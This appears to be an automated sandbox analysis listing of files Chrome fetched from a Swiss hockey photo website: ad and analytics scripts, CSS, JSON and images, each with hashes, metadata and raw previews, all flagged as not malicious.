                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:C++ source, ASCII text, with very long lines (2875)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9039
                                                                                                                                            Entropy (8bit):5.5264402315890315
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:37D6140D181883B03975D9454DBBFDED
                                                                                                                                            SHA1:38EF8848A82E58ABE73C1A880D03DD3C53637FCC
                                                                                                                                            SHA-256:2AC52BD16D3C1BB75FAC25D4961FC73897894D990F43844BEF8E7BE36FACB84B
                                                                                                                                            SHA-512:57252A856DE4EE9E51E13225AA7931F421E1C31EFFCD1F22E0ED5BB6C7E8B6472A43E84960E7DD45474E80677933B319ADDBC370BEFE326B680A511BB3635FC7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/html/r20241212/r20190131/zrt_lookup_fy2021.html
                                                                                                                                            Preview:<!DOCTYPE html><script>.(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var l=this||self;var n,p;a:{for(var aa=["CLOSURE_FLAGS"],w=l,z=0;z<aa.length;z++)if(w=w[aa[z]],w==null){p=null;break a}p=w}var ba=p&&p[610401301];n=ba!=null?ba:!1;function ca(){var a=l.navigator;return a&&(a=a.userAgent)?a:""}var A;const da=l.navigator;A=da?da.userAgentData||null:null;function B(a){return n?A?A.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function C(a){return ca().indexOf(a)!=-1};function E(){return n?!!A&&A.brands.length>0:!1}function F(){return E()?B("Chromium"):(C("Chrome")||C("CriOS"))&&!(E()?0:C("Edge"))||C("Silk")};function ea(a,b){Array.prototype.forEach.call(a,b,void 0)};function G(a){G[" "](a);return a}G[" "]=function(){};var fa=ca().toLowerCase().indexOf("webkit")!=-1&&!C("Edge");!C("Android")||F();F();C("Safari")&&(F()||(E()?0:C("Coast"))||(E()?0:C("Opera"))||(E()?0:C("Edge"))||(E()?B("Microsoft Edge"):C("Edg/"))||E()&&B
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10019)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18468
                                                                                                                                            Entropy (8bit):4.942984129844562
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4601BA55044413706C2022CB6C1C3D05
                                                                                                                                            SHA1:5103EC2FBB389568EBF5CFE4FD721F3DF2FF7AEC
                                                                                                                                            SHA-256:FE513EF974B767510D0A2B9F1B4D3AFA53185B89AB617C869E5E3D6DB960192C
                                                                                                                                            SHA-512:8DAB2D19378E34B40043621AAC57B418E56486DCFEBD1A5991BE8A02EE6B071D07EC6BFD9408DEA8FF0198995DE9D42A46E66513D68B40B68056707E4E691E01
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.5.6
                                                                                                                                            Preview:@keyframes bounce{20%,53%,80%,from,to{animation-timing-function:cubic-bezier(.215,.61,.355,1);transform:translate3d(0,0,0)}40%,43%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-30px,0)}70%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-15px,0)}90%{transform:translate3d(0,-4px,0)}}.bounce{animation-name:bounce;transform-origin:center bottom}@keyframes flash{50%,from,to{opacity:1}25%,75%{opacity:0}}.flash{animation-name:flash}@keyframes pulse{from,to{transform:scale3d(1,1,1)}50%{transform:scale3d(1.05,1.05,1.05)}}.pulse{animation-name:pulse}@keyframes rubberBand{from,to{transform:scale3d(1,1,1)}30%{transform:scale3d(1.25,.75,1)}40%{transform:scale3d(.75,1.25,1)}50%{transform:scale3d(1.15,.85,1)}65%{transform:scale3d(.95,1.05,1)}75%{transform:scale3d(1.05,.95,1)}}.rubberBand{animation-name:rubberBand}@keyframes shake{from,to{transform:translate3d(0,0,0)}10%,30%,50%,70%,90%{transform:translate3d(-10px,0,0)}20%,40%
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):635
                                                                                                                                            Entropy (8bit):4.935503452030465
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:78C712103F580C3932FDCC24670F0FC7
                                                                                                                                            SHA1:DCEAE7FFB152333503578CCEC6FF598665AB5833
                                                                                                                                            SHA-256:2667D53C498DF0240BA33839840AF2B4316444C5D98985751D0991B9C545FBF9
                                                                                                                                            SHA-512:B6C4C427121CDF44FCBEFB8B64E34DDE31AC5EE8211D97268C93797BB5CEF2EC150BB3C7FD711BB3BC2A6DD1169DCA6512B620BEC6653B5F5A6A10FDD05B4C56
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:"https://pixel.adsafeprotected.com/services/pub?anId=930694&slot=%7Bid:myFakeSlot,ss:%5B0.0%5D,p:myFakeSlot,t:display%7D&slot=%7Bid:div-ad-gds-3961-1_1,ss:%5B728.90,994.560,994.500,994.250,994.233%5D,p:fr-phothockey.ch/div-ad-gds-3961-1,t:display%7D&slot=%7Bid:div-ad-gds-3961-2,ss:%5B300.600%5D,p:fr-phothockey.ch/div-ad-gds-3961-2,t:display%7D&slot=%7Bid:div-ad-gds-3961-3,ss:%5B300.250%5D,p:fr-phothockey.ch/div-ad-gds-3961-3,t:display%7D&slot=%7Bid:div-ad-gds-3961-1_2,ss:%5B728.90,994.560,994.500,994.250,994.233%5D,p:fr-phothockey.ch/div-ad-gds-3961-1,t:display%7D&slot=%7Bid:div-ad-gds-3961-1,ss:%5B728.90,994.560,994.500,994.250,994.233%5D,p:fr-phothockey.ch/div-ad-gds-3961-1,t:display%7D&wr=1280.907&sr=1280.1024&sessionId=cc3786de-2059-0f70-ef77-5c6f5f4c794e&url=https%253A%252F%252Fphothockey.ch%252F"
                                                                                                                                            Preview:{"fr":"false","brandSafety":{"adt":"veryLow","alc":"veryLow","dlm":"veryLow","drg":"veryLow","hat":"veryLow","off":"veryLow","vio":"veryLow"},"slots":{"myFakeSlot":{"id":"1532fcf3-cc44-11ef-9888-8a4d87e6920e"},"div-ad-gds-3961-3":{"id":"1532fcf6-cc44-11ef-9888-8a4d87e6920e"},"div-ad-gds-3961-1":{"id":"1532fcf8-cc44-11ef-9888-8a4d87e6920e"},"div-ad-gds-3961-2":{"id":"1532fcf5-cc44-11ef-9888-8a4d87e6920e"},"div-ad-gds-3961-1_2":{"id":"1532fcf7-cc44-11ef-9888-8a4d87e6920e"},"div-ad-gds-3961-1_1":{"id":"1532fcf4-cc44-11ef-9888-8a4d87e6920e"}},"custom":{"ias-kw":["IAS_3007987_PG","IAS_1510294_PG","IAS_3010460_PG","IAS_3010248_PG"]}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3882
                                                                                                                                            Entropy (8bit):7.864523449998456
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:04C46A55ACDFC807A6364118AACE65FE
                                                                                                                                            SHA1:91747EEAE8B451769A1965166C0966F36DF39EA3
                                                                                                                                            SHA-256:6B7EEFAA167C84B98DE295163AC3DB5F817D08F769BF7E7C854FC80986626DDE
                                                                                                                                            SHA-512:C1B64422B5CF02D07D15999F42A5A2D9011A759B2EB2BCBD00C28948F2B7146AEE18282EF317248A14014AD99ABBEE627F8CE86EB104EEFFF69AF0ECDEBE598E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_7949.jpg
                                                                                                                                            Preview:RIFF"...WEBPVP8X...........Y..VP8 B....6...*..Z.>.<.H%."!1;.(...f...V.C....>.......|._.'...3......@.:?.^......;....k{.....E;3./.}..p...^i..p_._h.......<..o.y......~.{*g..?.........s..?oT!N.VD....,!.....".Q...K\f.r.J8j.r.$%B.E..*..~hv:<m...3%}.O......T...U...s.`.5.I<.ok............1.NH..l.`.....J.`*."....V0......R....8...5..$...W/.7 xdG.N..z.~.............)`...a|A....rLc..LGWX!.aa.-e.4...7..L.hc9kP...;....j".%!z.4.ck..;.+X.kBZ=....=q.....?....^a.p._.P.?"=T8j.......^^...{w..T>..6....6,r..j....}..Pr..e!...W...8o...W.k.].*...>..b& .H.=."I.B.O...~rG.....u....].Mh+..w...(.p`U..2(P.s...."S3.....C^G....h.C.Q..b....]?r..5...%...Fm$Z.8.m,.b2..N.'.:..;.3..&..JS.......b.....a..U.).u.L..T.O.$;2*<|.Oz$.XWjv.........pQ.V.;%.<D..B.M...|.{1..!.p......j..o.w......HXS].....V=...>;&....Z~uSAO..a..,.(..8}xs......C.c.....9$.k..d)./....Ed...+..3L.....{..PB...c..4..,.0.O..mQ{..wm.....z.|..|.$....h.G..e.7.G.xx.|..I.....bj..'.4....$......Y.l...1K.....)}Ur........
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1957)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23309
                                                                                                                                            Entropy (8bit):5.5179619832506575
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A8377F399296C8BBF97A7AB7ADA056C6
                                                                                                                                            SHA1:6F9A3B9843BD2693018472BF9970F8879C0CB35A
                                                                                                                                            SHA-256:85F1E4821C07DFEB7B420ECE6771846C2CB453F676D51931C0564324F0B9DE23
                                                                                                                                            SHA-512:DEB08681B10B7292A1E5F146B827099ACB51E599D7F3C122B77448C12AA522C60DE49F8DE26EE22EE9C18865AB02A73D4334262E59F2C7F61D93E21A34C840DA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://tpc.googlesyndication.com/pagead/js/r20241212/r20110914/elements/html/interstitial_ad_frame_fy2021.js
                                                                                                                                            Preview:(function(){'use strict';var aa=Object.defineProperty;function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ba(this); .function ea(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function fa(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=fa;return p.apply(null,arguments)};var ha,r;a:{for(var ia=["CLOSURE_FLAGS"],t=n,ja=0;ja<ia.length;ja++)if(t=t[ia[ja]],t==null){r=null;break a}r=t}var ka=r&&r[610401301];ha=ka!=null?ka:!1;var u;const la=n
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19201
                                                                                                                                            Entropy (8bit):7.968146990205252
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:35AEE21093E09EBB43E21604D7B656A4
                                                                                                                                            SHA1:50280F9CAEA84CECFD5F64A7ADEE6981EF0D74E3
                                                                                                                                            SHA-256:2A83C5EA8776B566C4136632E1AD0E10504C22C69087DC6E794EBD3C43F4CBC4
                                                                                                                                            SHA-512:2B5DC68E7B497D45789FE1C636617A83AE255083FB3C37CDA3C41007B0DA411C7475C16B2B707152A325702081B92E0CAB3E002AF69042A12961E984871FC32C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............"..................................................................................#...H...|z..x. B...tz.K....0.;.u.7...=..w..%.$jseg.I..(..g.J-..{.F.[?.{E.w..@.9.;B..^!.L.....5).....l..:.y.F.w5.<....O...y{{.~.>+...ZK..By/WZ36u..R.O.Y|.......V&....b...;&.-..vf..>...+1tC...z...&.^. .Z.X..7."....H>x.y.......{....uQ}..h.:......=..L0i.;A.@.F..*.7..........."*...yhX-../........_K..d.(..uI..5,.+I....m1.&s.$....t+.....C....,..<E...}.........e0.P..'..q.]..3.....!:...f.....NQ..8g.:r...n....\..q...Z..X........mK?Q....T.....v..O...s5.rm_.yo?z&._3^.\..W.|.O..........^........0.....n....Et{b.*........k.x..5.....Q.+.B..~...u.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1018
                                                                                                                                            Entropy (8bit):7.195337945719732
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2C80F73C99AD0218DC7BD6F154A6DF49
                                                                                                                                            SHA1:FCB9BB15CB442215941036F712E585945E9B13AE
                                                                                                                                            SHA-256:1D70B6562FC02A2D17296024377559238B11F7AD7FA882DBFEBAC0B76A8FB6E9
                                                                                                                                            SHA-512:587DA1169BC260271552B2809153C95AF631DE3AF07DD7BF8FA7CBC13BDD90881DA3032DFD8E7AB956307FE3363F3304DA11C5128432CCCC4C3F66F8A03A6FE8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:32/h:32/q:mauto/ig:avif/https://phothockey.ch/wp-content/plugins/gtranslate/flags/32/en.png
                                                                                                                                            Preview:RIFF....WEBPVP8X..............ALPHL....w`.m.JI!........W....&.@H*....]..d.C..."h!....cD.'.\.E..bT+...C..1.s*....VP8 ....p....* . .>.8.H%#..7.....l..2.up..@.(@m....Q...G.......g.......~........[>...I..|........o..F...?...g.8?.....h.C.w....=...s........1....._...Yf.s.b.U.[...{.$..`........G.t[...P...un..n........{QY.w...7..Vo}....{X..........D.5...S..J.<.L.....<..N.. ]..G.C..W.O..hc.,.._...............ccMh..A.#...<Y.qp#...o<M].5.(J......"w.7o.ox...]..&.)..t...Ku.Y~..K......~&.5...25B.O.R..u.t.*`G.A......... .../............e...e.......J;;(..t..?.8:...;..-.........Cg]..A.v(...s..c..qf..o...2{....+.......$....WFk.u.S....WK.7......Y.y....vg.......|>......(4....-..._0...&....C.....7S.\..-/ +.zL.6T...?.SI8.G......6^........=.A....W....c.uPX....~...KT.8...B..U_.y.......`e.....EXIF....Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... .
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:C++ source, ASCII text, with very long lines (2166)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):40054
                                                                                                                                            Entropy (8bit):5.522338390075279
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:96181671DD08D690335BC8B37B0582CB
                                                                                                                                            SHA1:B6413C51DA086EE9A780B0BE6490FAF04B1F9430
                                                                                                                                            SHA-256:F2F45FB32B5ED331419E2F8FA3496A27D81CA3E9319CB41BC72FE644C321E523
                                                                                                                                            SHA-512:23B203C679A13FD6F87FDDF41E300540965842C17BA66418122B81079138CA639A9816EC6D85485781216CB21B6A1A7821C2E9F30F6B765A48E7AA117ED50D3E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://www.gstatic.com/mysidia/96181671dd08d690335bc8b37b0582cb.js?tag=addon/mysidia_one_click_handler_one_afma
                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;function ba(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=m,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b}function ca(a){return a};function q(a,b){if(!b)return a;b.indexOf("&")===0&&(b=b.substring(1));const c=/[?&]adurl=([^&]*)/.exec(a);return c?`${a.slice(0,c.index+1)}${b}&${a.slice(c.index+1)}`:`${a}${a.indexOf("?")===-1?"?":"&"}${b}`}function da(a,b){switch(a){case 0:return b?"&ri=1":"";case 1:return b?"&ri=24":"&ri=27";case 2:return b?"&ri=25":"&ri=26";default:return""}}.function ea(a){a=a.o;if(!a)return"";let b="";a.platform&&(b+="&uap="+encodeURIComponent(a.platform));a.platformVersion&&(b+="&uapv="+encodeURIComponent(a.platformVersion));a.uaFullVersion&&(b+="&uafv="+encodeURIComponent(a.uaFullVersion));a.architecture&&(b+="&uaa="+encodeURIComponent(a.architecture));a.model&&(b+="&uam="+encodeURIComponent(a.model));a.bitness&&(b+=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23734
                                                                                                                                            Entropy (8bit):7.988465698596061
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D3B19E10B9399724F0787D1DE2BFDC53
                                                                                                                                            SHA1:D049D66A77DC82AD50A6B8AC8AC79C1428DA047E
                                                                                                                                            SHA-256:0BD22F7A6C9D4470CBECB6B4E5340D79D982FA735515A2E6847F0985EF4CAB95
                                                                                                                                            SHA-512:6EA808A11726A127F6E0B35DD8D0DF9BDC0AC41CA925362C4C7DD0E211AE40D77F1FB665A5D78CE6F857BC1C8B5DD7A2787BE8A8DCC0F1912E15832DA7BD1D44
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/4Y0A7129.jpg
                                                                                                                                            Preview:RIFF.\..WEBPVP8X..............VP8 .[.......*....>.@.H...!,......d@>...d8..>..W..Q.... Z..x....Xk`oq.....[.........E...G..P...S.^...z....G...........~.....z..............Y...w.S.[........P....|...~X>7.G.....>m....c.T...s......].S..?..B.1.................{..=.....^....._V>......o......|K>........O.....}....o..?......................]..sVN...:.n..}.56.^.D.../.).x....>.f..zwhfiv..8:.F..D92N6*'..... U......A..7....U._?.k.O....q...3X.....G....&..D'....].....I.H.....m.'.$....V....9..T....r....4................O.E1Lg......9R..8.H..#..8....1]......5(9>[.K........'q.......=....4............q..j..^...{....L...p]d....As+6.]kz.5....u......T.q8.4.{..1_....Q.(.k.0.I`...3...I.....*......I.t.}.&...jh..i.....\W.}.#.....O..........P#<.e(b.1.Y...}..<.=e.....)...p.>.G_$i....C(...........5..k....!.?.....uZ...cGyE.o.....f}..$...0`.8..4...B..Lw....R..|.1....f.F.....zSz.t.( "..G..D.....`.....s.o....:.>.n6.s.?....wk....+.....^F..%......+!...WF.=P...O*....g
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4094
                                                                                                                                            Entropy (8bit):7.771825173632281
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:EB9A59557F1EFE80282CDA7582EFFDF6
                                                                                                                                            SHA1:E78E68897D00A7C6C79CC3DAC05E04121283E7A5
                                                                                                                                            SHA-256:95C21BED1B752530FCF0A7AB84ADBACD50697361E28D6EC117B900EF93CACE79
                                                                                                                                            SHA-512:6448F982085C8A1FA98DBBAEE7DAE1A1A0269122E153CDC1A08E30590D3F84A16BCFEA865247C3096C2478590FD2FBB12D54868E4C125A184C72F7D2938238C6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z....".................................................................................%.*...h..l..G0.n(.>..p.8......N..+.M...1....~p..G.]>x...@z._..sP.2...q..}&...&...r[....t..UE.24.R.....R.Ky(......r.mg0.oD\..[..t..D.9f...........).57i..ss..../..V.......M..M.+.......y.h.rZ....w<|.\...............l.8...h.h...A.......C.B............z...~.%.....*...........................1....!. "A.#2............h.Lh...Y;+..d....#Gc...O.#..#......1.F.V.(....;}*.2$z..5..$..g....L.]QX.t.=^.d.s..\.j..]f...o..[$.A6...Y..]..d.*...#..~. .&J.tR..v.:.....#U3.P.....ibw...;a.'.w..4..V>..nUV......].m1..D(..0.T[..tS....k.."...{.}..#%.|...E.=G...~.Qc.A.|R1,..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5945)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):284046
                                                                                                                                            Entropy (8bit):5.585396993827563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D6AC444D6ECFD0F5F5897863D100DCD3
                                                                                                                                            SHA1:160310A32079E4EC779682041167CB98F5669698
                                                                                                                                            SHA-256:ABA75725609BB26EEF4390E7EB541BEBAD9083FFBE0D7C300C9642D42ED12565
                                                                                                                                            SHA-512:135927D080F5F73D4D7452148D58DAF1DBB6D19D76191C652ACCDEBCCE35B0F4E84EF6CD9880B3798391349A846D5ACD4597FB3772CA41A49B72AFDC7EBF04A6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-722EJY2GMM
                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":8,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":8,"vtp_includeConditions":["list","phothockey\\.ch"],"tag_id":12},{"function":"__ogt_session_timeout","priority":8,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTO
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1842
                                                                                                                                            Entropy (8bit):7.844880044441599
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C69C796362406F9E11C7F4BF5BB628DA
                                                                                                                                            SHA1:E489CE95AB56208090868882113D7416ABF46775
                                                                                                                                            SHA-256:4DAC0026FBFA2615DCE30C0AF12830863FE885F84387A0147B9E338F548D5D82
                                                                                                                                            SHA-512:D3AD560ED0FD29BE7D2CC434694F09E5A6FBEA8B29C0611AECB54A1B73B4D722C53F42A19DAE9E3D5D358444E50FB8FFFBC39D67CE751BDBC8C861F6F95D3162
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......IDATx..Uw.X...........b.....pb.Sfff.6....3o.wvF.(..r.u..9_|...Is%..D......Xz.c....;...y;.....&#.l......H...X..s..]}..5`aZ..D.m....uk.c..i.|.H... I#yB.7.0..._E.".h..Xt.....9.4.......0:y.....F.ua^.|.....K..G..b&2;.z."...B/l$..s3.@..G..Z..`...p..EUU.hni...aZZZT......."...H.Z.....H....<..g.......U.........f."../...Gg...$....<YTU.p.....ND"$^.5!..@.8....Nhj.f.]......"..B..i..,...oh.5.....F.L........;"C...bO...*.Qa.G..!.....4.._....l..N.].....g...PoD....1r{......X.1..!.....}.o....=..^6i.{.......9`i...\~...Dyy9..`..D...n>.....7:.....1...t.(.D.=>....DH.0...K.Mx....,....$..1.1.P.T.............@'..6...Kv..e...D.?.X...k.2..|l.$m&...K/.c......Vn....V ...`I......8al.zT.=..+Wr..%?.X.`..g....,..[...nc..:!..$.@2..3.|....sB...&..*.a.<..}).zX.Q.)5....X.1..bk.....Vn...C#.c......mx.=.[...,.r.G....OMS....e.06.#.+..8Fne......B!...%..,........W...*.F..x#.Vv....I..c(...x5..u.....`hP.......&>......8...D#Cg.v.{Hyb.v..8.K7X`.....|O.z.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3124
                                                                                                                                            Entropy (8bit):7.826812916915401
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B3F61037B77D687BD82C409814B4A656
                                                                                                                                            SHA1:86E6ADCE3616F7941F183A8552CFB76157CCB2C3
                                                                                                                                            SHA-256:823D2C176F9006DF2B26C598BA60E19618D57441CF76761F5B6B9D5492D5843B
                                                                                                                                            SHA-512:C84745461FB6347DCDC21292169BCAC6213CE22406263C8860A27311FAAAD535C04ED03C0EE64BD100E97B8D5247FC85ACD9EE7A9B01065B140E032C7E1835C4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/08/IMG_1320.jpg
                                                                                                                                            Preview:RIFF,...WEBPVP8X...........Y..VP8 L...P0...*..Z.>.@.I...&.......d..d.}......"...U..o.x........;....<.._...w.7.y.._.@.....>.|...@.a......}=.<..o..`?...y....?..._.A..5....v....t'P..}..Z......g....:.b:L.j..!..`....?...L!.%..2...T.I.........k.*.E.n{...V...._i......P.{.[]..>..O`..h.k..~&..-.....V..g...9.|.`...t.4M..b....F!....;9.6.......c.p,.........-......f.C..`yt........)...g..u.....r#.l..[`R E.:E..B.M,.7'}p........yNu.j^Cc.O..t*.Q...o..U*|b.X\G.^....|N..P.....D.A.@Q.Px.n.AK.~...2....u&ic....y#...6I..n.)..A..B.............'..Y.D..."6.:..n.C.[.g...S.tG-....q^.3m.x\$.-.....A..X... >e.FQo_2.....k...=Sfvr{L....$..<>.;&....I.;.h>=...>.N.l.......?.Ou.=Gc.d;FaE.p...G.....,I....p"k...Y..?.....@uu.!.....{T0t..$P.....u.+..F.S....}y./..M.0.....q=.}..r..........+..->.n....$...bk!(......U.W.~.I..q3.....D..*......"..\^jS...S..t.57... =..P..3.@LT.LvL.....^>k@`.M.hS.h...-...<..............._i#P(.....qd.4......,c5.(....!...)..Y...}5s&.....<.M..L.D.:.O.m;Ld~
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (36994)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):37033
                                                                                                                                            Entropy (8bit):5.185144417780792
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3211CCCDE3F239748F7A87EDD935F50A
                                                                                                                                            SHA1:D29C7A637FD1FEAD2E30D3FABEEE4B0FDFA64971
                                                                                                                                            SHA-256:22F977105367AFC342362F5BA6D9361109629A73B66673B2B93C051A43AA7439
                                                                                                                                            SHA-512:A71A34BF35D06D5D01A313751496DF82289F89B6A8145AEB9FB3FFBFC6EE6A2AC6496DDC08612A5C96C51F565DD915A168F153F01A19D981BECC9D1DBD0EAD83
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
